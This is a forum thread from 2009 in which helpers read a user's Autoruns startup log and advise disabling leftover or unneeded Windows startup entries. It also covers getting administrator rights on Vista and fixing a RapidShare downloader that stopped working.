HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
QuickTime Task
Program path & name:
"c:\program files\quicktime\qttask.exe"
Enabled: [V]


Program:
"iTunesHelper Module"
Publisher:
"(Verified) Apple Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
iTunesHelper
Program path & name:
"c:\program files\itunes\ituneshelper.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NBKeyScan
Program path & name:
File not found: C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
Enabled: [V]


Program:
"Safe Search pluggable protocol"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\SOFTWARE\Classes\Protocols\Handler
Entry name:
linkscanner
Program path & name:
"c:\program files\avg\avg8\avgpp.dll"
Enabled: [V]


Program:
"ObjectDock"
Publisher:
"(Verified) Stardock Corporation"
Entry path:
C:\Users\user\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Startup
Entry name:
Stardock ObjectDock.lnk
Program path & name:
"c:\program files\stardock\objectdock\objectdock.exe"
Enabled: [V]


Program:
"recovery information"
Publisher:
"(Not verified) fsc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
recinfo
Program path & name:
"c:\recinfo\recinfo.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Update
Program path & name:
"c:\users\user\appdata\local\google\update\googleup date.exe"
Enabled: [V]


Program:
"DAEMON Tools Lite"
Publisher:
"(Verified) DAEMON Tools Code Signing Services"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
DAEMON Tools Lite
Program path & name:
"c:\program files\daemon tools lite\daemon.exe"
Enabled: [V]


Program:
"AnyDVD Application"
Publisher:
"(Verified) SlySoft Inc."
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
AnyDVD
Program path & name:
"c:\program files\slysoft\anydvd\anydvdtray.exe"
Enabled: [V]


Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
Task Scheduler
Entry name:
GoogleUpdateTaskUserS-1-5-21-4090995505-84853843-37879430-1000.job
Program path & name:
"c:\users\user\appdata\local\google\update\googleup date.exe"
Enabled: [V]


Program:
"Adobe PDF Helper for Internet Explorer"
Publisher:
"(Verified) Adobe Systems Incorporated"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects
Entry name:
Adobe PDF Reader Link Helper
Program path & name:
"c:\program files\common files\adobe\acrobat\activex\acroiehelper.dll"
Enabled: [V]


Program:
"Safe Search for Internet Explorer"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects
Entry name:
AVG Safe Search
Program path & name:
"c:\program files\avg\avg8\avgssie.dll"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects
Entry name:
SSVHelper Class
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\ssv.dll"
Enabled: [V]


Program:
"[[[DESCRIPTION]]]-----------------------------------------------"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects
Entry name:
AVG Security Toolbar
Program path & name:
"c:\program files\avg\avg8\avgtoolbar.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects
Entry name:
Google Toolbar Helper
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\She ll Extensions\Approved
Entry name:
WinRAR shell extension
Program path & name:
c:\program files\winrar\rarext.dll"
Enabled: [V]


Program:
"AVG Shell Extension"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\She ll Extensions\Approved
Entry name:
AVG8 Shell Extension
Program path & name:
"c:\program files\avg\avg8\avgse.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\She ll Extensions\Approved
Entry name:
Haali Column Provider
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\She ll Extensions\Approved
Entry name:
Haali Matroska Shell Property Page
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\She ll Extensions\Approved
Entry name:
Haali Matroska Thumbnail Extractor
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
"iTunes Mini Player DLL"
Publisher:
"(Verified) Apple Inc."
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\She ll Extensions\Approved
Entry name:
iTunes
Program path & name:
"c:\program files\itunes\itunesminiplayer.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Classes\Folder\Shellex\ColumnHandler s
Entry name:
Haali Column Provider
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
"PDF Shell Extension"
Publisher:
"(Not verified) Adobe Systems Inc."
Entry path:
HKLM\Software\Classes\Folder\Shellex\ColumnHandler s
Entry name:
PDF Shell Extension
Program path & name:
"c:\program files\common files\adobe\acrobat\activex\pdfshell.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
googletoolbar1.dll
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
"ToolBand Module"
Publisher:
"(Verified) DAEMON Tools Code Signing Services"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
dttoolbar.dll
Program path & name:
"c:\program files\daemon tools toolbar\dttoolbar.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Extensions
Entry name:
Sky
Program path & name:
File not found: http://www.sky.com"
Enabled: [V]



for your information i use firefox, internet explorer sucks and never ever used it on this pc infact i installed firefox from a usb before you say how did you get firefox then

also a notification came up before that never has before saying that avg internet security is off while windows internet security is on

dox online
12-05-09, 07:10
I wasn't typing anything in? What are you on about? I was mealy saying that I have had experience with mIRC virues, being a mIRC user for a very long time.
I was talking about pneboy, sorry for the confusion.

EscondeR
12-05-09, 09:59
Download and run Autoruns (http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx) and kill those entries:


Program:
"IP in IP Tunnel Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IpInIp
Program path & name:
File not found: system32\DRIVERS\ipinip.sys"
Enabled: [V]


Program:
"IPX Traffic Filter Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFlt
Program path & name:
File not found: system32\DRIVERS\nwlnkflt.sys"
Enabled: [V]


Program:
"IPX Traffic Forwarder Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFwd
Program path & name:
File not found: system32\DRIVERS\nwlnkfwd.sys"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
CtrlVol
Program path & name:
File not found: C:\Program Files\Launch Manager\CtrlVol.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
LaunchAp
Program path & name:
File not found: C:\Program Files\Launch Manager\LaunchAp.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Wbutton
Program path & name:
File not found: C:\Program Files\Launch Manager\WButton.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NPCTray
Program path & name:
File not found: C:\Program Files\Norman\npc\bin\npc_tray.exe"
Enabled: [V]


Program:
" "
Publisher:
"(Not verified) "
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google EULA Launcher
Program path & name:
"c:\program files\google\google eula\googleeulalauncher.exe"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
SunJavaUpdateSched
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\jusched.exe"
Enabled: [V]


Program:
"QuickTime Task"
Publisher:
"(Not verified) Apple Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
QuickTime Task
Program path & name:
"c:\program files\quicktime\qttask.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NBKeyScan
Program path & name:
File not found: C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
Enabled: [V]


Program:
"recovery information"
Publisher:
"(Not verified) fsc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
recinfo
Program path & name:
"c:\recinfo\recinfo.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Update
Program path & name:
"c:\users\user\appdata\local\google\update\googleup date.exe"
Enabled: [V]


Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
Task Scheduler
Entry name:
GoogleUpdateTaskUserS-1-5-21-4090995505-84853843-37879430-1000.job
Program path & name:
"c:\users\user\appdata\local\google\update\googleup date.exe"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects
Entry name:
Google Toolbar Helper
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
googletoolbar1.dll
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Extensions
Entry name:
Sky
Program path & name:
File not found: http://www.sky.com"
Enabled: [V]

pneboy
12-05-09, 12:05
Download and run Autoruns (http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx) and kill those entries:


Program:
"IP in IP Tunnel Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IpInIp
Program path & name:
File not found: system32\DRIVERS\ipinip.sys"
Enabled: [V]


Program:
"IPX Traffic Filter Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFlt
Program path & name:
File not found: system32\DRIVERS\nwlnkflt.sys"
Enabled: [V]


Program:
"IPX Traffic Forwarder Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFwd
Program path & name:
File not found: system32\DRIVERS\nwlnkfwd.sys"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
CtrlVol
Program path & name:
File not found: C:\Program Files\Launch Manager\CtrlVol.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
LaunchAp
Program path & name:
File not found: C:\Program Files\Launch Manager\LaunchAp.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Wbutton
Program path & name:
File not found: C:\Program Files\Launch Manager\WButton.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NPCTray
Program path & name:
File not found: C:\Program Files\Norman\npc\bin\npc_tray.exe"
Enabled: [V]


Program:
" "
Publisher:
"(Not verified) "
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google EULA Launcher
Program path & name:
"c:\program files\google\google eula\googleeulalauncher.exe"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
SunJavaUpdateSched
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\jusched.exe"
Enabled: [V]


Program:
"QuickTime Task"
Publisher:
"(Not verified) Apple Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
QuickTime Task
Program path & name:
"c:\program files\quicktime\qttask.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NBKeyScan
Program path & name:
File not found: C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
Enabled: [V]


Program:
"recovery information"
Publisher:
"(Not verified) fsc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
recinfo
Program path & name:
"c:\recinfo\recinfo.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Update
Program path & name:
"c:\users\user\appdata\local\google\update\googleup date.exe"
Enabled: [V]


Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
Task Scheduler
Entry name:
GoogleUpdateTaskUserS-1-5-21-4090995505-84853843-37879430-1000.job
Program path & name:
"c:\users\user\appdata\local\google\update\googleup date.exe"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects
Entry name:
Google Toolbar Helper
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
googletoolbar1.dll
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Extensions
Entry name:
Sky
Program path & name:
File not found: http://www.sky.com"
Enabled: [V]


would you be able to give a brief explenation on what these do because, when i had a problem playing tombraider on my pc last year i was told to kill a process and it cut of my internet until i rebooted

dox online
12-05-09, 14:34
would you be able to give a brief explenation on what these do because, when i had a problem playing tombraider on my pc last year i was told to kill a process and it cut of my internet until i rebooted
Find each entry in autoruns and untick the entries that match up with the ones posted.

pneboy
12-05-09, 16:51
the computer is complaining im not admin, but i know i am

EscondeR
12-05-09, 18:28
^ CLICKY (http://www.tombraiderwiki.com/index.php/Administrator) :)

pneboy
12-05-09, 20:12
done that, what should happen and how do i hide the admin again, damn vista lying to me making me thing i am ruler of this computer

spikejones
12-05-09, 22:19
when you enable the administrator account, reboot into it!
as a side note, there is an option on the autoruns "file" menu that you can select after starting it, in order to "run as administrator" ;)

pneboy
13-05-09, 17:26
i think stopping those things did something to my pc, now my rapidshare software wont work not the checker its called "rapidshare auto downloader" i really need to use it

EscondeR
13-05-09, 17:34
You can reenable this entry, IF you really need it:

Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]

Actually, using those free tools by different file shares (downloaders, notifers, etc) is highly unsafe, therefore I always recommend to not use them. 70% of this stuff is pure spy/adware.

pneboy
13-05-09, 17:39
thats not the same program, its a different thing that notifys me of free accounts, the program i need to work is a downloader all it does it downloads the files automatically because i get side tracked

edit: just tried to get on rapidshare.com and its coming up with
HTTP 500 - Internal Server Error

but this site reports its still up
http://downforeveryoneorjustme.com/

spikejones
13-05-09, 20:05
I'd say to clear your cache and cookies and try again, perhaps your connection with Rapidshare has been altered in some manner by the rapidshare free acount notifier service, but generally a 500 error is server side specific only: http://www.checkupdown.com/status/E500.html

as per your services, there is only ONE in your log related to rapidshare (and as such only ONE you have altered the status of). that one would be the free acount notifier mentioned above.